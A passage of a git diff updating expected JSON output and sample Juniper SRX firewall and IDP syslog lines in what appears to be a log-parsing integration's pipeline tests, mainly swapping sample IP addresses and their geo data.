"81.2.69.193" + "ip": "67.43.156.14" }, "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066100414Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason=\"TCP CLIENT RST\" source-address=\"81.2.69.193\" source-port=\"48873\" destination-address=\"81.2.69.193\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"81.2.69.193\" nat-source-port=\"48873\" nat-destination-address=\"81.2.69.193\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", + "ingested": "2021-12-10T10:13:51.707105400Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason=\"TCP CLIENT RST\" source-address=\"67.43.156.14\" source-port=\"48873\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"48873\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "start": "2013-01-19T15:18:20.040Z", "action": "flow_close", @@ -2226,7 +2144,7 @@ "port": 768 }, "port": 768, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -2234,22 +2152,22 @@ "destination": { "nat": { "port": 768, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 768, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "rule": { "name": "alg-policy" @@ -2257,28 +2175,22 @@ "source": { "nat": { "port": 24065, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 24065, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -2315,8 +2227,7 @@ }, "related": { "ip": [ - "89.160.20.112", - "81.2.69.193" + "67.43.156.14" ] }, "client": { @@ -2324,12 +2235,12 @@ "port": 24065 }, "port": 24065, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:20.066102468Z", - "original": "\u003c14\u003e1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@2636.1.1.1.2.35 source-address=\"89.160.20.112\" source-port=\"24065\" destination-address=\"81.2.69.193\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"89.160.20.112\" nat-source-port=\"24065\" nat-destination-address=\"81.2.69.193\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"]", + "ingested": "2021-12-10T10:13:51.707114900Z", + "original": "\u003c14\u003e1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"24065\" destination-address=\"67.43.156.14\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"67.43.156.14\" nat-source-port=\"24065\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"]", "kind": "event", "action": "flow_started", "category": [ @@ -2410,8 +2321,8 @@ }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:20.066104532Z", - "original": "\u003c14\u003e1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@2636.1.1.1.2.134 source-address=\"10.0.0.26\" source-port=\"37233\" destination-address=\"10.128.0.1\" destination-port=\"161\" connection-tag=\"0\" service-name=\"None\" protocol-id=\"17\" icmp-type=\"0\" policy-name=\"MgmtAccess-trust-cleanup\" source-zone-name=\"trust\" destination-zone-name=\"junos-host\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\".local..0\" encrypted=\"No\" reason=\"Denied by policy\" session-id-32=\"7087\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", + "ingested": "2021-12-10T10:13:51.707124300Z", + "original": "\u003c14\u003e1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@67.43.156.15 source-address=\"10.0.0.26\" source-port=\"37233\" destination-address=\"10.128.0.1\" destination-port=\"161\" connection-tag=\"0\" service-name=\"None\" protocol-id=\"17\" icmp-type=\"0\" policy-name=\"MgmtAccess-trust-cleanup\" source-zone-name=\"trust\" destination-zone-name=\"junos-host\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\".local..0\" encrypted=\"No\" reason=\"Denied by policy\" session-id-32=\"7087\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", "risk_score": 1.0, "kind": "event", "action": "flow_deny", @@ -2433,7 +2344,7 @@ "port": 80, "bytes": 646, "packets": 3, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -2441,24 +2352,24 @@ "destination": { "nat": { "port": 80, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, "bytes": 646, - "packets": 3, - "ip": "81.2.69.193" + "ip": "67.43.156.15", + "packets": 3 }, "rule": { "name": "permit-all" @@ -2466,23 +2377,23 @@ "source": { "nat": { "port": 48873, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 48873, "bytes": 392, - "ip": "81.2.69.193", + "ip": "67.43.156.14", "user": { "name": "user1" }, @@ -2532,7 +2443,8 @@ "user1" ], "ip": [ - "81.2.69.193" + "67.43.156.14", + "67.43.156.15" ] }, "client": { @@ -2542,13 +2454,13 @@ "port": 48873, "bytes": 392, "packets": 5, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066106525Z", - "original": "\u003c14\u003e1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@2636.1.1.1.2.129 reason=\"TCP CLIENT RST\" source-address=\"81.2.69.193\" source-port=\"48873\" destination-address=\"81.2.69.193\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"81.2.69.193\" nat-source-port=\"48873\" nat-destination-address=\"81.2.69.193\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", + "ingested": "2021-12-10T10:13:51.707133700Z", + "original": "\u003c14\u003e1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@67.43.156.15 reason=\"TCP CLIENT RST\" source-address=\"67.43.156.14\" source-port=\"48873\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"48873\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "start": "2020-01-19T15:18:20.040Z", "action": "flow_close", @@ -2572,7 +2484,7 @@ "port": 80, "bytes": 2132, "packets": 34, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -2580,24 +2492,24 @@ "destination": { "nat": { "port": 80, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, "bytes": 2132, - "packets": 34, - "ip": "81.2.69.193" + "ip": "67.43.156.14", + "packets": 34 }, "rule": { "name": "default-permit" @@ -2652,7 +2564,7 @@ "related": { "ip": [ "10.1.1.100", - "81.2.69.193", + "67.43.156.14", "172.19.34.100" ] }, @@ -2668,8 +2580,8 @@ "event": { "duration": 60000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066119830Z", - "original": "\u003c14\u003e1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.129 source-address=\"10.1.1.100\" source-port=\"58943\" destination-address=\"81.2.69.193\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"172.19.34.100\" nat-source-port=\"6018\" nat-destination-address=\"81.2.69.193\" nat-destination-port=\"80\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"16118\" packets-from-client=\"42\" bytes-from-client=\"2322\" packets-from-server=\"34\" bytes-from-server=\"2132\" elapsed-time=\"60\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" destination-interface-name=\"ge-0/0/0.0\" category=\"N/A\" sub-category=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", + "ingested": "2021-12-10T10:13:51.707143100Z", + "original": "\u003c14\u003e1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address=\"10.1.1.100\" source-port=\"58943\" destination-address=\"67.43.156.14\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"172.19.34.100\" nat-source-port=\"6018\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"80\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"16118\" packets-from-client=\"42\" bytes-from-client=\"2322\" packets-from-server=\"34\" bytes-from-server=\"2132\" elapsed-time=\"60\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" destination-interface-name=\"ge-0/0/0.0\" category=\"N/A\" sub-category=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "kind": "event", "start": "2020-07-14T14:17:11.928Z", "action": "flow_started", @@ -2693,7 +2605,7 @@ "port": 8883, "bytes": 9670, "packets": 96, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -2701,24 +2613,24 @@ "destination": { "nat": { "port": 8883, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 8883, "bytes": 9670, - "packets": 96, - "ip": "81.2.69.193" + "ip": "67.43.156.15", + "packets": 96 }, "rule": { "name": "default-permit" @@ -2782,7 +2694,7 @@ "related": { "ip": [ "10.1.1.100", - "81.2.69.193", + "67.43.156.15", "172.19.34.100" ] }, @@ -2798,8 +2710,8 @@ "event": { "duration": 23755000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066123087Z", - "original": "\u003c14\u003e1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason=\"idle Timeout\" source-address=\"10.1.1.100\" source-port=\"64720\" destination-address=\"81.2.69.193\" destination-port=\"8883\" connection-tag=\"0\" service-name=\"None\" nat-source-address=\"172.19.34.100\" nat-source-port=\"24519\" nat-destination-address=\"81.2.69.193\" nat-destination-port=\"8883\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"3851\" packets-from-client=\"161\" bytes-from-client=\"9530\" packets-from-server=\"96\" bytes-from-server=\"9670\" elapsed-time=\"23755\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" secure-web-proxy-session-type=\"NA\" peer-session-id=\"0\" peer-source-address=\"0.0.0.0\" peer-source-port=\"0\" peer-destination-address=\"0.0.0.0\" peer-destination-port=\"0\" hostname=\"NA NA\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", + "ingested": "2021-12-10T10:13:51.707152400Z", + "original": "\u003c14\u003e1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"idle Timeout\" source-address=\"10.1.1.100\" source-port=\"64720\" destination-address=\"67.43.156.15\" destination-port=\"8883\" connection-tag=\"0\" service-name=\"None\" nat-source-address=\"172.19.34.100\" nat-source-port=\"24519\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"8883\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"3851\" packets-from-client=\"161\" bytes-from-client=\"9530\" packets-from-server=\"96\" bytes-from-server=\"9670\" elapsed-time=\"23755\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" secure-web-proxy-session-type=\"NA\" peer-session-id=\"0\" peer-source-address=\"0.0.0.0\" peer-source-port=\"0\" peer-destination-address=\"0.0.0.0\" peer-destination-port=\"0\" hostname=\"NA NA\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "risk_score": 1.0, "kind": "event", "start": "2020-07-13T16:43:05.041Z", @@ -2822,7 +2734,7 @@ "port": 53 }, "port": 53, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -2830,28 +2742,22 @@ "destination": { "nat": { "port": 53, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 53, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "rule": { "name": "default-permit" @@ -2904,7 +2810,7 @@ "related": { "ip": [ "10.1.1.100", - "89.160.20.112", + "67.43.156.15", "172.19.34.100" ] }, @@ -2917,8 +2823,8 @@ }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:20.066125571Z", - "original": "\u003c14\u003e1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.129 source-address=\"10.1.1.100\" source-port=\"49583\" destination-address=\"89.160.20.112\" destination-port=\"53\" connection-tag=\"0\" service-name=\"junos-dns-udp\" nat-source-address=\"172.19.34.100\" nat-source-port=\"30838\" nat-destination-address=\"89.160.20.112\" nat-destination-port=\"53\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15399\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", + "ingested": "2021-12-10T10:13:51.707162Z", + "original": "\u003c14\u003e1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"10.1.1.100\" source-port=\"49583\" destination-address=\"67.43.156.15\" destination-port=\"53\" connection-tag=\"0\" service-name=\"junos-dns-udp\" nat-source-address=\"172.19.34.100\" nat-source-port=\"30838\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"53\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15399\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "risk_score": 1.0, "kind": "event", "action": "flow_started", @@ -2941,7 +2847,7 @@ "port": 53, "bytes": 82, "packets": 1, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -2949,29 +2855,23 @@ "destination": { "nat": { "port": 53, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 53, "bytes": 82, - "ip": "89.160.20.112", + "ip": "67.43.156.15", "packets": 1 }, "rule": { @@ -3031,7 +2931,7 @@ "related": { "ip": [ "10.1.1.100", - "89.160.20.112", + "67.43.156.15", "172.19.34.100" ] }, @@ -3047,8 +2947,8 @@ "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066127625Z", - "original": "\u003c14\u003e1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason=\"Closed by junos-alg\" source-address=\"10.1.1.100\" source-port=\"63381\" destination-address=\"89.160.20.112\" destination-port=\"53\" service-name=\"junos-dns-udp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"172.19.34.100\" nat-source-port=\"26764\" nat-destination-address=\"89.160.20.112\" nat-destination-port=\"53\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15361\" packets-from-client=\"1\" bytes-from-client=\"66\" packets-from-server=\"1\" bytes-from-server=\"82\" elapsed-time=\"3\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" profile-name=\"N/A\" rule-name=\"N/A\" routing-instance=\"default\" destination-interface-name=\"ge-0/0/0.0\" uplink-incoming-interface-name=\"N/A\" uplink-tx-bytes=\"0\" uplink-rx-bytes=\"0\" category=\"N/A\" sub-category=\"N/A\" apbr-policy-name=\"N/A\" multipath-rule-name=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", + "ingested": "2021-12-10T10:13:51.707171200Z", + "original": "\u003c14\u003e1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason=\"Closed by junos-alg\" source-address=\"10.1.1.100\" source-port=\"63381\" destination-address=\"67.43.156.15\" destination-port=\"53\" service-name=\"junos-dns-udp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"172.19.34.100\" nat-source-port=\"26764\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"53\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15361\" packets-from-client=\"1\" bytes-from-client=\"66\" packets-from-server=\"1\" bytes-from-server=\"82\" elapsed-time=\"3\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" profile-name=\"N/A\" rule-name=\"N/A\" routing-instance=\"default\" destination-interface-name=\"ge-0/0/0.0\" uplink-incoming-interface-name=\"N/A\" uplink-tx-bytes=\"0\" uplink-rx-bytes=\"0\" category=\"N/A\" sub-category=\"N/A\" apbr-policy-name=\"N/A\" multipath-rule-name=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "kind": "event", "start": "2020-07-13T16:12:05.530Z", "action": "flow_close", diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log index c05d9732fb5..d866cd19a99 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log @@ -1,7 +1,7 @@ -<165>1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.28 epoch-time="1583190783" message-type="SIG" source-address="10.11.11.1" source-port="12345" destination-address="187.188.188.10" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="HTTP:MISC:GENERIC-DIR-TRAVERSAL" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="3.3.10.11" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"] -<165>1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.28 epoch-time="1583190783" message-type="SIG" source-address="10.11.11.1" source-port="12345" destination-address="187.188.188.10" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="CRITICAL" attack-name="TCP:C2S:AMBIG:C2S-SYN-DATA" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="3.3.10.11" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"] -<165>1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.135 epoch-time="1507845354" message-type="SIG" source-address="183.78.180.27" source-port="45610" destination-address="118.127.111.1" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="172.19.13.11" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"] -<165>1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.135 epoch-time="1507845354" message-type="SIG" source-address="183.78.180.27" source-port="45610" destination-address="118.127.30.11" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="172.16.1.10" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"] -<165>1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@2636.1.1.1.2.35 epoch-time="1319367986" ddos-application-name="Webserver" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="172.27.14.203" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" rulebase-name="DDOS" policy-name="A DoS-Webserver" repeat-count="0" message="Connection rate exceeded limit 60" context-value="N/A"] -<165>1 2011-10-23T16:28:31.696 SRX34001 